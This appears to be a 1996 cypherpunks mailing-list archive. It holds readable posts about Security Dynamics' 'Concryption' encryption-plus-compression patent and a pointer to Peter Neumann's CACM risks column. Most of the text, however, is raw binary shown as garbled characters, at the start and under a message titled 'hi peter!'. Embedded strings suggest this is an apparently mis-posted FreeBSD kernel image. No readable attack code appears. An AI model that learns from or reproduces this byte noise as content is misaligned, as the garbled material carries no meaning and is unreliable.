"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
‹‹C‰Bë‹C£hÒð‹S‹‰ÿ
ˆäð€c&ýé¡
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
"äðfc&ÿ¿¡"äð€äð9täðv-ƒ=ôfð
¸ÿ
ºÿ


‹Mfƒy(

‹‹C‰Bë‹C£hÒð‹S‹‰Ç

‹C£hÒð‹S‹‰Ç
‹C£hÒð‹S‹‰Ç
¡¤äðƒÀÂ‰ äð‰ÐƒÀ£täð¡|äð@täð£xäð¡täð|äð=päð
h~ðèünùÿeø[^ÉÃ
‹àíð...Òu1ÀÉÃQ%ÿ
h¸ðè€nùÿ‹BR‹@ÿÐÉÃ
h$ðèmùÿ‹Bÿu
R‹@ÿÐÉÃ
¸
ƒøt5ë;‹F<‹P
¶@
9Œðð
"
"
+ùÿƒÄö
uæ€ëöF0tj
Sè""ÿÿƒÄƒ8u
‹Eü÷ÐÁèë¸
¸


h>"ðè Xùÿƒ}Ì




‹uÇž
ÇŒ›ðŒWðƒ=Œ›ð


u¡|Uðj
ÿp‹@ÿÐƒÄ¡|UðSÿp‹@ÿÐ‹]üÉÃ%r
>
é°
ìþpþðé¹



$ïˆ

·ÃƒÁƒÆþyóƒ}ü
hpºðèU4ùÿƒþÿu
‰ú¶ÂÃ·Ó‰ØÁèûÿÿ







PRhÄ1/4ðèm2ùÿƒÄƒ=Tð
PRha1/2ðè².ùÿèm6úÿè1/4ÿÿèÚÿÿƒÄ
ƒ=Lð


  Features=0x%b

=
ëh¨Ãðë
h¬Ãðëh°ÃðèŽ*ùÿƒÄh¸Ãðè*ùÿƒÄ€=4°ð
‹†à
WèJÞøÿ¸
‹G$ƒ 
syncing disks... 








dumping to dev %lx, offset %ld







ëlƒøtWëeƒ=¬Òð



~ßÇPðÿû

èýÿÿj
¸

ÇA,-
‰ÐAL9Eø}.‹]ø9YLu
A4A81ÀëHUø+QL...Ò
ÇA,
ƒ}è
jJÿuüè³¡øÿ‹EèeÜ[^_ÉÃU‰å‹E
‹U¶
ƒ<

ùÿÿ5âðèE}ÿÿÿ5âðèšpÿÿ¡âðÿp è9
u
Sè
ÉÃget_pv_entry: cannot get a pv_entry_t
hŒåðè
¸
...Ét‹‰‹A‰B‹A‰Bë0ÇB
...Ét/9qu9YtÊ	...Éuî...Ét‹‰ÿÀ_ð¡

‰Ù1Àüó¯t@...ÀtœƒÇü‰ú+UøÁú‰ÖÁæ
ÿEð¶Eü‹...h¯ðþÿïûïw

þÿÿ¿ïv
ƒ'ù	
Æ

hÄîðèüþøÿ‰ðÁè‹M‹ƒ<‚
ƒ?
¡ð^ðƒ8


ƒ~
_^ÃVW‹t$
‹|$‹T$BüJt
¬ªÀu÷J1Àë¸?
_^Ã1/4D$t@Ã1ÀÃWV‹|$
‹t$‹T$1À‰ÑÁéüó§u	‰Ñƒáó¦t@^_Ã‹D$ë¸
h#
ðèÈãøÿfƒ¸ä
h/
ðèãøÿR‹‹P‰Q‹H‹‰Z¹DËðÁâÑ;	t
Áê"ˆðÇ@
h8
ðèÂâøÿR‹‹P‰Q‹H‹‰Z¹ŒâðÁâÑ;	t
Áê"ŒðÇ@
h)
ðètâøÿR‹‹P‰Q‹H‹‰Z¹È"ðÁâÑ;	t
Áê""ðÇ@
ƒÁpQè9Ö

¹ðé&



Fatal trap %d: %s while in %s mode










þŽ°
¸
‹I‰MÌë‹Žà
¸
‹› 
i
‹› 
‹€ 
Ç‚
Ç‚
Ç‚
Ç‚
Ç‚
Ç€Œ
Ç€Œ
u&‰Ø9]}‹EPVÿu
ÿuèÿÿÿÿE
Ot-1ÛƒÄëC€<3
)ð(ÿÿÿSèBËøÿj
Sè-ýÿÿƒÄë¡)ð...(ÿÿÿ¡)ð...,ÿÿÿ...(ÿÿÿP...8ÿÿÿP...HÿÿÿP...\ÿÿÿP¸)ðƒ}
èÿÿÿÉÃ!bActive!n-!bDrivers
)ðRÿuàèëÂøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè"Âøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè×Áøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàèÁøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè'Áøÿjÿÿuàÿu
‹Uƒ}
)ðRÿuàè×Àøÿjÿÿuàÿu
‹Uƒ}
"›
ƒøXtié<þÿÿƒøctgé2þÿÿƒøtK
ƒøxtLéþÿÿ=W

‡h
ÇƒŒ
è
úÿÿ‰ÇƒÄGÿƒø
‡€
ÇƒŒ
...Àt7é5üÿÿƒø...+üÿÿèNëÿÿé!üÿÿjÿ5èðè¯àÿÿj
FreeBSD Kernel Configuration Utility - Version 1.0
 Type "help" for help or "visual" to go to the visual
 configuration interface (requires MGA/VGA display or
 serial terminal capable of displaying ANSI graphics).







1Àéò
CB€;
€; t€;	ußÆD*À
E1/4PSèž






















)ðE¹PèÜ(c)øÿƒÄ$·C
...Àt1/4À@HPh¢1ðEÄPè1/2(c)øÿ¿C
Ph¢1ðEÊPèª(c)øÿÿsh
)ðEÐPè(tm)(c)øÿƒÄ$ÿsh¢1ðEØPè...(c)øÿÿsh¢1ðEáPèt(c)øÿÿs h
)ðEçPèc(c)øÿƒÄ$¸GLðƒ{4
ƒÃ@ƒ;
ƒû
tƒû
uÆ

ÇEø

‹EðƒÀÉëEðÀøw=EðÀ(c)Eð9}ð}/...ö|9Mür
u‹Uô9Uð~3/4ÿÿÿÿë
3/4
h-Sðèðšøÿ‹OD‰Mü‹w@æ
h|TðèÈ(tm)øÿ‹^@ã

¸ÿÿÿÿë‰
PVð‰5TVðÆµð1Àeø[^ÉÃU‰å€=¶ð


è9¨ÿÿƒÄ"À|ò1ÿj	èÝþÿÿ˜l


æpˆÐæq°
æp°æqj
è¤ÿÿ‰ÂƒÄ...Òth´_ðRhþ_ðè9øÿƒÄ
j
Æ´ð)Š´ð°
æpˆÐæqÉÃ





MàÐ1Ò÷ñ...Òt‹M
‹	±
MàÐ1Ò÷ñ...Òt‹M
‹I±






ƒ{




C9û|¿1Àe¸[^_ÉÃSense Drive Status failed














ÇEð
Wjjÿuìèeøÿÿhà"
Wjjÿuìè"øÿÿÄ...Àuhà"
u
ÿ0è





h%{ðë0¿ †










²÷ÿƒÄƒ~
‡



öF(...•üÿÿ‹F$%À
ƒ~Ž÷þÿÿ‹F$%À





Eð‰ÚîY‰ÚìˆÁ€áˆÈîÆ†¯
·-ª
·-ª

ƒùt]ë‰ƒù@t#ù€
ÆƒÎ
1Àé;

Phó£ðë¶(c)

0ÀîQ
îQ
° îQ
°îQŠƒâ

Ç†€
·-ª


"

·-ª
·-ª
SRè(c)(úÿƒÄ‰Eøƒ}ø4u0SVè
ÇEø

ÿÿÇ

ŠEø‰Êîf‹MøfÁé‹}ðƒÇ
ˆÈ‰úî‹MðƒÁ‰ð‰ÊîfÁè‹uðƒÆ	‰òî°
‹Uðî€"°
ŠEðîf‹UðfÁêˆUü‹MøƒÁ
ŠEü‰Êî‹MøƒÁŠE‰Êîf‹MfÁé‹uøƒÆ	ˆÈ‰òî°‹Uøî€¿°

ŠEÜ‰Êîf‹MÜfÁéw
ˆÈ‰òîOˆØ‰ÊîfÁëO	ˆØ‰Êî°‰úî‹M€¹°



/øÿƒÄh#ºðèý.øÿ€MüÿuüSèÔùÿÿƒÄ
...À...
¸
æ °Âæ °æ °(æ¡°æ¡°æ¡°ÿæ¡°
æ ‹]üÉÃisa_dmacascade: impossible request
ÉÃ€âˆÑ€ÉÀˆÈæÖˆÐæÔÉÃisa_dmastart: impossible request
é§
‰ð$
Dë‰ð$
HæÖ0ÀæØµðÿÿÿ‰Uü‰ÑÁÀ
NMI ISA %x, EISA %x



‰Møƒûw
ƒûtƒþ
v
¸
èåŒÿÿ‰òì"Eø¶ÈƒÄ¶Eü9ÁtKuâ¶Eü9Á"À%ÿ
ÇEü

fƒ¹Ôð
€f÷Vèç÷ÿeø[^ÉÃlpclose
QèD
öFt€Neø[^ÉÃinterrupt-driven



"

ì4¸$ø8EètI""
‰
Ø^ðë
¡Ü^ð‰H‰
Ü^ðÿà^ð¡(







EôPèêÿÿ‹U‹R‰UìƒÄú°ÿæ!ƒÂ‰Uè°€î°
‹Uìî‰×G0À‰úî°‹Uèîh,E

1Àé3/4
ŠC
ˆC
ÿC‹Eô€
€}ü

fƒ""
¸
Ç`ýð

$
‹uÐÆÔ
‹}ÐŠO€á¿ˆO‹]ÌƒÃˆÈ‰Úîé(
j‹Uÿ2ÿuÐèÕ

B‰Uø¨-t(¨tÉ
¸
ÇEü
ë*ƒûtë#ŠA$‰òÐë‰ð
Aë‰ðöÐ"AˆA‹Qlîû1Àeø[^ÉÃU‰åƒìVSj



‹ƒàƒøu&÷B
ˆ


è‹Oÿÿä`ƒÄëìèCL
èqOÿÿä`ˆÁƒÄ€ùút€ùît€ùþt	CûŸ†
è5OÿÿƒÄäd¨tðj
è%Oÿÿä`¶ÐˆÁƒÄ€ùútÚ€ùªt
RhÊ	ðè:æ÷ÿ¸

ðèä÷ÿƒÄ€=d3ð
ðë"hË
ðë=`3ð´
ðëhâ
ðèÊã÷ÿƒÄÿ5X3ðjhê
ðèµã÷ÿ1Àeô[^_ÉÃ
...Àt"é
c
À"H
K






f‹Cf‰G‹C@%

›þÿéÒöÿÿŠ"Ét
€ùté-ýÿÿ€KH é¸öÿÿ9,²ðu)ƒ{H u#Æi3ð
¸



Æ\3ð
ƒøMtQé­

...öté.
...ötéF

‰Gé"
ƒ%X3ðýöG(t
€
X3ðë7ƒ%X3ðûé­
‰Y‹ÀYð‰r¡ÀYð£,²ð¹

ƒú8tié¥
QèÞ¹þÿ‹5,²ð‹F
À‰Eô†
‡M

Æi3ð

è#ÿÿƒÄKƒûÿuê‹]üÉÃ
èãÿÿä`¶ÐƒÄúú
ºÅ

‹UôîAƒù~Þ‹`3ðƒÂì1ÉˆÈºÀ
¸

ðë‹EäÈŠ"1
ð‹]ˆA9MøÌGÿÿ
ÆT4ð
¶†î









1Àéé




öG"z
ƒÄ
‹Uø€z	F‹MIÁàÇ€|Zð
...À"Æ
"ž
€Oéù
tO‹UR‚Áà"HZðÿD8ƒ|8
ÇD4
$X<Xth€qðQÿuôèÓ
hÇwðë'ÆC	1Àé(tm)
u
Sè

t	Sèî
MˆÈîSŠMþÁˆÈîSŠEîh'





¸
¸ÿÿÿÿÉÃ‹@Zð...Àth"ðh€vðœ

¸
...³ýÿÿ‹]ôèWþÿ...À...¯ýÿÿƒ}ø


P3/4CPh±...ðè-j÷ÿeø[^ÉÃU‰åVS‹]‹M
3/4SR‚ÁàÇ€|Zð
¸
€z	~ÆB	Aƒù~Ùh ¡

<...¸\ð
"É|öÁt
WìˆF
ŠEü È8Eüu
‰Èƒàë"û'
BAŠˆ"Àuö‰Ø‹]üÉÃ
uB9Âr÷)ÐÉÃ
P¶E	P¶EPh°ðh1/4\ðèÞi÷ÿ¸1/4\ðÉÃ
¿




¶ðø¶ð$·ðP·ð|·ð
	The Regents of the University of California.  All rights reserved.


ð¡zð›zð'zð‹zð†zðzðyzðuzðozðgzð_zðUzðLzðEzð;zð1zð'zð#zðzðzðzðýyðõyðìyðãyðÙyðÔyðÊyðÄyð¿yð·yð"yð¢yð(tm)yðyð"yðyyðmyðayðYyðNyðByð9yð-yð)yðyðyðyð÷xðëxðßxðÔxðÈxð1/2xð






		
 @			

		!






		
		

 !@€

÷ððÜÿðhðôTðÐÿð

ller

Soundblaster, SBPro, SB16, ProAudio Spectrum










jJ



**

3

[k
ð 

	





    cosmos@sponsor.octet.com:/usr/src/sys/compile/SPONSOR


@îð~
	
ðˆ	





















ð

ð€



ðŽ"
*
+
2
3
$Pð";
ðÂ;
?
B
G
ð-H
ðKN
ðOU
ðúV
ðâZ
_
c
d
ðth
ð h
ðÃi
j
¹ð÷p
t
ðÃx
ðy
z
Dðâ
†

ðS
ðW•
ð\•
ðj•
ðq•
ðx•

¤¤
indoverlap
sc
cksum
lose
_vop_pathconf_vp_offsets
nfs_mmap
ad
lpg1

_spec_print
getlock

ab_tty
_kstack
nit
xec_check_permissions
d
p_pager_free_swap
winactive
te_in_progress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 4 Jan 1996 22:53:38 +0800
To: cypherpunks@toad.com
Subject: \"Concryption\"
Message-ID: <199601041435.PAA16631@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Cambridge, MA, Jan 3 -- Security Dynamics plans to
license "Concryption," a just patented technology
combining encryption and compression, to outside
companies for use with a variety of security and
compression protocols, revealed Kenneth Weiss, chairman
and chief technical officer.  

"It is my belief that Concryption will solve the two
biggest problems that exist today: the need for privacy
and more available bandwidth," Weiss said.  

"Compression has been catching on. It takes less time
today to send a whole page of fax than it used to, for
example, and part of that is because of better data
compression. But encryption has not caught on in the way
it should, because of time and expense issues and the
hassles of key management."  

Still, though, available bandwidth for data storage and
transmission is diminishing all the time, in arenas
ranging from fax to satellite technology, networked
information, and the World Wide Web, according to the
company chairman.  

Compression will become an even more significant
requirement in the future, with an anticipated explosion
of multimedia applications, he predicted.  

Security Dynamics has been awarded US Patent No.
5,479,512 for Concryption. The Cambridge,
Massachusetts-based company now holds a total of 14
patents from the US Patent Office, most related to its
"core business" of computer security, he reported.  

One of the company's other patents, for instance, is for
a biometric technology designed to enable "voice
fingerprinting." Security Dynamics also produces the
SecureID Card, ACE/Server, and ACM series of user
authentication products.  

Security Dynamics' newly patented Concryption technology
is based on mathematical synergies between the processes
of encrypting and compressing data. Both procedures call
for analyzing arrays of binary patterns, "seeing where
the spaces are," and then applying rules to the data.  

Weiss added that encryption and compression are both
highly intensive in terms of CPU (central processor unit)
cycles and disk accesses. As a result, he asserted,
integrating the two technologies into a "single set of
operations" will bring cost reductions in CPU usage as
well as faster encryption times.  

"The time to compress might increase a little bit, but on
the other hand, the time to encrypt goes to zero.
Whatever the disk accesses are for compression, there
would be no other disk accesses for encryption."  

Security Dynamics sees Concryption as a "concept pattern"
suited to use with a variety of data types, network
transports, and security protocols, according to Weiss.
"This is a new enabling technology that we believe should
have an impact on the way information is communicated in
the future."  

The company intends to work with outside licensees on
integrating different compression and encryption methods.
"Big users have already optimized compression for their
unique technologies. We use a different form of
compression for fax than we would for satellite data or
TV pictures. Beyond that, companies might employ
different compression algorithms. Similarly, people like
to have control over the type of encryption used," Weiss
maintained.  

Although forthcoming multimedia applications will require
much greater compression than text, conventional needs
for "privacy" may not be as high, since many video
offerings of the future will be geared to entertainment,
Weiss acknowledged.  

"But we will probably be seeing 'economic privacy,' " the
company chairman noted, pointing to a trend, already well
established in the cable TV industry, toward providing
"high demand" fare such as first-run movies only on
separately priced, encrypted, "premium channels."  

Contact: Security Dynamics, 617-547-7820












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 5 Jan 1996 05:34:39 +0800
To: cypherpunks@toad.com
Subject: CACM Jan 96 "Inside Risks" column
Message-ID: <9601042046.AA02968@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Peter G. Neumann has a very good column this month on risks and the
"worldwide rush [to] digital commerce."  Summarizes problems with our
infrastructure, gives some concrete examples, and discusses importance of
privacy as a commodity, and how "We need, among other things, ...  consistent
use of good cryptography in operating systems and application software."

	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FreeBSD user <fb@sponsor.octet.com>
Date: Fri, 5 Jan 1996 05:45:42 +0800
To: cypherpunks@toad.com
Subject: hi peter!
Message-ID: <199601041557.PAA09665@sponsor.octet.com>
MIME-Version: 1.0
Content-Type: text






Ç$°
óÃ

Â
ðÂ‰Ü3ð1/4Ðÿ¿ï1À‰Å¡¨°ð‰p¶
¸



1ÀeÔ[^_ÉÃ



¸
tF@9ÁsEA€9
uö‰ÏN€~ t
€~	u
A€9 tú€9	tõS.ë
€9	tŠˆAB9ùs€9 uìÆ




¸
)ÎµDúÿÿÿ...@úÿÿ‹Húÿÿ9@úÿÿrÏ‹•Púÿÿ•@úÿÿ9•lúÿÿs‹µlúÿÿ9µPúÿÿs
+µPúÿÿ‰µ@úÿÿ"
¸
Äÿµðúÿÿÿµøúÿÿÿµôúÿÿÿµüúÿÿÿuè1/2õÿÿƒÄ...Àu"ÿµüúÿÿÿuè|õÿÿÿµôúÿÿÿuènõÿÿ1Àë
¸
ÑîKƒûwÿ7‹GÿÐƒÄƒøÿtE‰ÙÓà	ÆƒÃƒûvã‰ðƒàÁî‰w
ƒÃþ‰_ƒøu	Wèkúÿÿë'...ÀuWèê÷ÿÿëƒøt¸

hö#ðèÆ


1ÀéR
UØR‹UÂË


ÇXÀð

$
h‡5ðè"¸
1Àé˜
u‹V ‹R(‹M‰1ÀéT
u‹v ‰u¸‹M
‹Q‰V(1Àé
...
t
¸	
VWèÐð
fƒøt
fƒøtë*QE Pÿr ècS
fƒøt
fƒøtë*QE Pÿr è"R
fƒút"fƒúuHƒyt
¸
ÇEø2
uafÇEþ
t
¸-
fÇEü
¸	


´

h<Nðè¬š
h°NðèØ(tm)
jWèÆ
ÿ2èžè



öF(t€K(ƒ}

K
À"
¿
‰N0‹B(‰F4‹B(‹@‰F8j
¸
¸
ƒøtë7jõ
ÇEü
hqoðè°}
j(ÿuøè§

j(ÿuøès

‹Eøfƒxu
‹Eøë
‹Eø‹PëÈ1À‹]ôÉÃlf_findoverlap: default
éiÿÿÿ‹}ø9yu‹Uü9Qu
9Y
u	9q"*ÿÿÿ‹}ü9y>‹Uü9Qu‹}ø9yw.ƒûÿuƒþÿt$9q|
u9Y
s
ƒy
ÿuƒyÿu
¸
¸
¸

‹]äƒ{
K8ƒÄ...Éu‹S$öÆtV‹}‹‹uè)Lò‹
ò)O‰Î‰÷Áÿ‰ò‰ù‹}WO
‹S$öÆ...Oþÿÿ‹‹uèƒ|ñ
...Ét‹B‰A‹B‰j)Rè-öÿÿ1Àë@...öu1Àë3hÌ‡ðèþe
‰Z‰‰z‰r
‰ðeô[^_ÉÃ
¸
‹C0‰Fë.‹F9C0t$PèûÿÿƒÄ...Àt
‹-Ü
9st9suƒÿÿt!9{t9{t‹Eú
‹‹@9Ct‹‹@‰C‹UJ(
9{
t9{uƒþÿt!9s
t9st‹Eú
‹‹@
9C
t‹‹@
‰C‹UJ(
1ÀÉÃ¸
u
jRèõìÿÿƒÄ‰
‹€Ü
...ÀtéÝ
¸
¸
ƒøtéŒ
¸
¸
u,‹S9Vs$‹UÂú
u;
u;
ƒþ	tƒþu
¸

!ƒÄ
ƒþ	tƒþu
¸

WSè§
£¨
<tvéÉ
‰ð÷Ð!ƒ¨

öC)"
ƒøteë_ƒ{0~u÷Ç



f1/2^ÿÿÿt
"

Sÿ6ÿuëSÿuÿ6èáT

ƒútë+Qÿ3èŒV

ëQÿ3èxV

eð[^_ÉÃ
v
¸

‡¨
¸
¸
¸
RQÿuèA

À...
ÇƒL
[^_ÉÃ
¸
‹RPPè
)‹R)PPè
cleaning up... 
ÿ3è;÷





¸
ƒà@Å
JˆJ‹]üÉÃ


¸






QˆQ1ÀeÜ[^_ÉÃ
ƒã‰÷ƒç
‹M
...Òt9Zv
[¶DÂ£ør*j








Ð‹uü‰DžCƒû}~Å‹uüÇDžÿÿÿÿ‹Eüeð[^_ÉÃbad sector table corrupted
ÇEüäéð‹C$öÄtƒÆƒþ		9w,‡DÿÿÿÇC$ 


Sè	

ÇEñðÆEð 1öë...Û"8

Ç`ýð
Ç`ýð

VèT>ÿÿëR‹VÂÀ
ƒøtƒø#u1À+]ð‹}‰eÌ[^_ÉÃ
ƒûtƒû#u1Û+uð‹M‰1ƒ}˜
jÿu˜èô|ÿÿ‰ØeŒ[^_ÉÃ
ƒûtƒû#u1Ûƒû u
j
ÿuèh¥ÿÿ+uð‹}‰7‰ØeÌ[^_ÉÃ
ƒûtƒû#u1Ûƒû u
j
ÿuè4¤ÿÿƒÄ+uð‹M‰1ƒ}˜
jÿu˜èõzÿÿ‰ØeŒ[^_ÉÃ
u‹F ‰P(1Ûéó
"
u1Û‹F ‹@(‹tÿÿÿ‰ët‹Fÿuÿµtÿÿÿhwt@V‹@ÿÐ‰Ã‹tÿÿÿ÷ƒÄëK‹FÿuÿµtÿÿÿWV‹@ÿÐÃÄ...Ûu-÷Ç
¸
Ã
¸

¸
¸
ùf@tNë|ù	s@tXërƒ;
VSQè<ú
t*öCu$fƒ{$




9:ð
h/ðèÛ×ÿÿ¿N
‹äÕðf‹Jf¡ˆ"ðf‰Jf‹F
f£ˆ"ðÿ(tm)ðf‰^
·F9Œ:ðf‹=Œ:ðf)~ë"fÇF
ÿt
hMðèw×ÿÿ¡Ð...ð‰5Ð...ðeô[^_ÉÃmsg_cbytes is screwed up
·C9Â...b
h&ðèDÖÿÿÇF 
¸
¸
ÇC
Áâ·Æ	Â‹M‰1Àeð[^_ÉÃmsgwait
·G9Â...î
‹EðéY
h·ðèPÑÿÿ9=(tm)ð}
hÒðè>Ñÿÿ‹EøF9F s
hîðè'Ñÿÿ=Ð...ð
h-ðè
ÿÿf‹Møf‰H...ÿŽ"
hLðè¬Ðÿÿf‹ˆ"ðfƒûÿ
h]ðè•Ðÿÿ¿Ã9:ð
hmðèÐÿÿ¿Ã‰Eä‹äÕðf‹
Bf‰
ˆ"ðÿ
(tm)ð‹Eìf‹@
‹Mäf‰J‹Eìf‰X
O...ÿmÿÿÿj‹EìƒÀPÿuüèØè
ƒ}ø
h§ðèhÏÿÿffÿýƒ~ 
‹M
·A9Â...9
öEñ"D
öEñ"ì
‹M
·A9Ât
¸
f‰MèÇEì
h ðè´Ëÿÿ¿Eè9:ð
h ðèžËÿÿÿuàÿuü¿Eè¯Œ:ð°ÎðPè"ã

ƒøt
ë#‰
ÔÇðë)ÇÔÇð
¸
u	¸
‹u
·F9Â...Ö
‰E¸é
f@€äf‰D
f‰tÇD
Áâ·Ã	Â‹}‰1Àeè[^_ÉÃsemwait
‹M
·A9Â...Ð

ëfÿFj
‹M
·A9Ât
¸
é þÿÿfÿNé-þÿÿƒ}Ä
hß.ðèP1/4ÿÿKy1/21Û9]ÔŽ˜ýÿÿ[À·0‹MÐ‹I‰M¸Rf‹D0f)'C9]ÔÜémýÿÿÿEÌ‹MÔ9MÌŒ%ÿÿÿÇEÌ
hÎ2ðè"ºÿÿ‹]ð·C9Á|
hì2ðèºÿÿƒ}ô
‰ØÁè9Ât1Àë‰È‹]üÉÃ
¸
...À"Ž
Áâ·Ç	Â‹M‰1Àë¸
¸
hq:ðè³ÿÿ‰×ë‹=`×ðÇ`×ðÿÿÿÿÁà‰Ã<¯ðfÇC
f@€äf‰C
j
Áæ·Ç	Æ‰uüj
¸
SWè£÷ÿÿƒÄFƒÃ95L:ðäj‹G ÿ°Œ

Ç`ýð
9Æu5€y
ÿt/ƒ}ø
€y
ÿ...¸

u
‹MüöÁ@t3/4
èá$
t"‹Mô¶9Æt¶A9Æt¶A9Æu)þÿ
u.ö‡"
¸

Bë
ƒÂ€âø‰-Ä
t€m}
	t€Ü
‹Wh‹R
ë
º1u
¸
‹]üfƒ{
O\
¸
¸
¸
¸

@^tºZZðRh
t,‹µtþÿÿ¶9Ót¶V9Ót¶V9Óuûÿ


èîÞÿÿƒÄ¡
¦Œ
uUö†Œ
Nÿÿ‹]üÉÃ




h
lðë‹Gh‹X...Ûuh+lðWè_‚ÿÿé"
ƒøt9ëƒøt3‹Cl9Alr'‹Al9Clr
€y(
€y(
u
Vj
èsØÿÿƒÄVWèiØÿÿVèéÿÿƒÄ
‰
t€"=	t€}7=t€²
‹1/4Èðë
‹†¤
‹Áà	F`ë
‹Áà÷Ð!F`WVè

t€~b=t€t[é



1Àé¡
¸#

...ÉteéÀ


t€Jÿ	t€î

‹Fh‹@
ë1À‹M‰1Àéð
t€ÿ	t€}7ÿt€>ÿ}t€|6ë%ÿut€t
ÿt€tëÿt,€ÿt,€|€K@jVèxöÿÿƒÄ1Àö†

SèDÿÿÿë‰ØF
9F~‹^+^
‰Ø÷ØPè

‹
ƒÁ‰Kë
ÇC
ƒ}
‹
ƒÁ‰Kë
ÇC

hr‡ðè¨aÿÿ‹£PÊðÇ

hr‡ðèŒ_ÿÿ‹£PÊðÇ
¸
ÇˆÈð
ÿ¤Èðëÿ Èð‰Øeø[^ÉÃ
ÿ¤Èðëÿ Èð‰Øeø[^ÉÃ
Vèþÿÿ1ÀëIöFt#‹V‹N‰S‰Kf‹~fçf‰{{‰{
€fý‰3‰Þƒ}
cw
ºd
...öu"ƒ}

‹-é	
¸+
h?(r)ðè8?ÿÿ€KSèšþÿÿƒÄ‹Mü‰


P‹BÿÐÉÃsoaccept: !NOFDREF
uVèž
"%
uƒ}
‹E‹@‰Eôƒ}ô
ƒà‰Eð‹Bÿ@4ƒ}
¿ 
·y$éð
fƒà$fƒøu-öF
u@ƒ}ô
"œ
ƒ}ì
 tƒ}ô
ƒ}ô
...û
tÇEô9
"g
ƒ}ô

u
ƒ}ä
ƒ}ô
t€Mø‹MøöÁu?G0Pèd
tƒ
t‹Aƒx

j
‹
RQè
‹@ƒx
‹	ƒÁƒ9
huÍðèÀ ÿÿƒ}
‹[ƒ{
H‹
‹Rƒz

f‹Uüf	Vë
hÈÏðèöÿÿeð[^_ÉÃsbflush
hAÑðèäÿÿ‹]ü‹s‰uüéÙ

h¡Õðè@ÿÿ‹EøfÇ@

¸%
·^$fÇF$


‹@
ƒÀäë
‹EÔ‹@
ƒÀì+EÔƒø
v‹EÔƒ@
ôƒ@
ëj
ƒûtƒû#u1Ûƒû u
j
ÿuènËþÿƒÄ...Ûu+uð‹}‰7ƒ}Ø
¸(
¸(

ƒûtƒû#u1Û...Û...7
ëHÇEè
¸(
¸(
¸
j


€:wŠˆB‰ñˆ
‰øeô[^_ÉÃU‰å‹E‹U
‹M9Pv	‹
¸	
u	‰1ÀÉÃ¸&
¸-
ƒ}

ƒ~

ÇEü7
hÞéðèÿÿ‹F
‹ƒ}
tEöCtj
¸)
u)S ...Òt"‹B
x<Ëðuö@
thLøðÿrDèÝ
‰-ƒÆGfÿC
Ó...Ûu×uü_ÿ...Û|‹ÿp èÒÉÿÿƒÄƒÆKyíuü_ÿ...Û|j

h8þðèüïþÿC$öÄ ...Š
Sèˆ


G$%þÿÿëG$(c)
hFÿðèÀíþÿƒx
hYÿðè°íþÿƒ¿Ì
htÿðèLíþÿ‹Mð‰œŒ
èþÿfð...Ûtƒ{(t
hÌðèîçþÿ...Ûu(Çdð
ð‹E
PSèLªþÿÄ...Àt1/2‹uô‰5
ïÿÿƒÄu9s4tGC$(c)
ƒ}






èÿÿë‹U‹B$%ÿÿÿ‰B$Rè`¡þÿƒÄ‹Mü‰


€b0¿Rè´Ÿþÿeì[^_ÉÃU‰åƒìWVS‹MA$(c)

‹C
£žð‹S
‹C‰¡
‹C
£žð‹S
‹C‰ÇC
‹‹@
£žð‹‹P
‹@‰‹¡
‹EäéÀ
ÿuè´Ñÿÿ‹]Ø‰sD‹M‹QL‰SLeÌ[^_ÉÃvfs_cluster: warning: buffer already busy



¸
‹uÐfÿßÿÿ‹M‹A€8
‹M‰YfÿC‹u‰^‹MÐöA
uÇEø˜µð‰]ü‹
˜µð‹SEøP‹ŠÿÐƒÄ‹uÐöF"A
h'=ðèX°þÿÇEèÜ°ð‰}ì‹]
‰]ð‰uô‹
Ü°ð‹WEèP‹ŠÿÐ‰EÜƒÄ...Àt-øþ...Ä






ÿuüè^þÿÿë
h5Bðèò­þÿeð[^_ÉÃ
h5FðèŒ§þÿ‹MA,...ÀtöE
t
ƒxH
ƒ{H
h\Fðèœ¥þÿ1ÀeÜ[^_ÉÃbgetvp: not free
hyIðèÌ¤þÿ¡
Ç

Z‰<^ð‰8^ðÇB 8^ð"ÿÿÿë!ÇB
hÂOðèxþÿ...öt	SèýÿÿƒÄ¡(eð‰CÇC`
hÇQðèÔ›þÿöCtV1É‹C<‹
‹C £<^ð‹S ‹C‰¡8^ðC...Àt{‰x ë	{‰=<^ð‰8^ðÇC 8^ðÇC8

	

Í
Mð=|ð...ÿ"³
ƒz 
3/4
tsö
uWèHòÿÿ¸
töCuWè-òÿÿ¸-
ñÿÿ¸
¸
‹C£|ð‹S‹‰‹C
Ç@<
‹Mø‹U‰
1Àeè[^_ÉÃ

=
Pè<âÿÿë
ÿuÌèüáÿÿƒÄƒ}È
Sè`ßÿÿë
ÿuÌè ßÿÿƒÄSèßÿÿ‰ðe"[^_ÉÃ
¸	
t
¸
¸
f‰A
f‹B
f‰A
f‹Bf‰A
f‹Bf‰Aƒz4
"
"
"

3/4
3/4
ÊÿÿƒÄÿµxÿÿÿèüÉÿÿj
ÿu¤èÊúýÿƒÄ
ƒ}À
¸	
"
¸	
u	‰1ÀÉÃ¸
Pè¨Àÿÿë
‹}ÿwèeÀÿÿƒÄ‹MÇA
"
1/2|ÿÿÿfÿG1Àë
ÿµ|ÿÿÿèõ1/4ÿÿ‰Ø¥lÿÿÿ[^_ÉÃU‰å‹Eö
‹S‰V
‹S
